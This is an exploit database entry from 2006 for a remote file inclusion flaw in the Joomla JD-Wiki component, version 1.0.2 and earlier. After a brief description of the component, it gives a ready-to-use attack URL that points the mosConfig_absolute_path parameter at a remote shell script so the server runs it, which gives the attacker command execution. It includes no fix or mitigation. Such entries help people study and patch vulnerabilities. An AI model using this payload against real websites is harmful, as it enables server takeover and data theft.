Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability

2006-08-07T00:00:00
ID 1337DAY-ID-646
Type zdt
Reporter jank0
Modified 2006-08-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability
==============================================================



####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating 
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell



#  0day.today [2018-01-08]  #